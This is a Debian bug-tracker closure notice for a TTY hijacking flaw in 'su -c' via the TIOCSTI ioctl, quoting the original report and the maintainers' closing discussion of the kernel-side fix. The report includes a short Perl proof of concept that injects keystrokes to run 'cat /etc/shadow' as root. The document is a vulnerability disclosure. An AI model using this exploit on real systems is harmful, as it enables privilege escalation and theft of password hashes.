Your message dated Fri, 2 Jan 2026 12:55:23 +0100
with message-id <[email protected]>
and subject line Re: Bug#905745: util-linux: tty hijacking possible in "su" via
TIOCSTI ioctl
has caused the Debian Bug report #905745,
regarding util-linux: tty hijacking possible in "su" via TIOCSTI ioctl
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
905745: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=905745
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: login
Version: 1:4.1.4.2+svn3283-2+squeeze1
Severity: critical
After investigating why RedHat have a different behavior regarding "su -c" I
found out that there was a patch in RedHat to prevent tty hijacking when using
"su -c".
What makes the hijacking possible is that "su -c" still gives the command a
controlling tty, which means it has ioctl access to /dev/tty. This means it
can send things to the tty input buffer, which will be read just after su
ends.
The original report (with patch) on RedHat (from 2005?!?!?!) is:
https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=173008
A very simple exploit follows (Perl code)
____BEGIN_CODE____
#!/usr/bin/perl
require "sys/ioctl.ph";
open my $tty_fh, '<', '/dev/tty' or die $!;
foreach my $c (split //, 'cat /etc/shadow'.$/) {
ioctl($tty_fh, &TIOCSTI, $c);
}
____END_CODE____
The scenario is:
Root runs a command as a less priviledged user with "su -c", if the user was
compromised, the script will be able to run commands as root by injecting
keystrokes on the terminal.
-- System Information:
Debian Release: 6.0.1
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (i686)
Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages login depends on:
ii libc6 2.11.2-10 Embedded GNU C Library: Shared lib
ii libpam-modules 1.1.1-6.1 Pluggable Authentication Modules f
ii libpam-runtime 1.1.1-6.1 Runtime support for the PAM librar
ii libpam0g 1.1.1-6.1 Pluggable Authentication Modules l
login recommends no packages.
login suggests no packages.
-- no debconf information
--- End Message ---
--- Begin Message ---
On Sun, Apr 30, 2023 at 06:14:37AM +0200, Salvatore Bonaccorso wrote:
> On Sat, Apr 29, 2023 at 11:47:40PM +0200, Chris Hofstaedtler wrote:
> > Dear Kernel Maintainers, Security Team,
> >
> > * Sam Morris <[email protected]>:
> > > Linux 6.2 introduces a sysctl dev.tty.legacy_tiocsti sysctl which can be
> > > used to disable TIOCSTI. The default value of the sysctl is set at build
> > > time with CONFIG_LEGACY_TIOCSTI.
> > >
> > > <https://cateee.net/lkddb/web-lkddb/LEGACY_TIOCSTI.html>
> >
> > Maybe we can get this into 6.1?
>
> (For the metainformation I'm assigning it back to su, where the CVE(s)
> originally got assigned, but we can close the bug in future once the
> root issue is addressed on kernel side, I hope you are okay with
> that).
>
> It is unlikely we are going to enable this in bookworm, even if the
> change will be backported to 6.1.y, that is if the change would now be
> backported, I assume we will need to stick with the default being
> enabled. The time was too narrow before the
> freeze. But we have #1033095[1] for the corresponding bug on src:linux
> and to disable TIOCSTI it early in the trixie development cycle by
> default (which comes automatically).
>
> [1]: https://bugs.debian.org/1033095
>
> Hope this helps so far?
This landed in linux (6.3.2-1~exp1) experimental, and is thus fixed
in trixie and newer. Closing here.
Chris
--- End Message ---
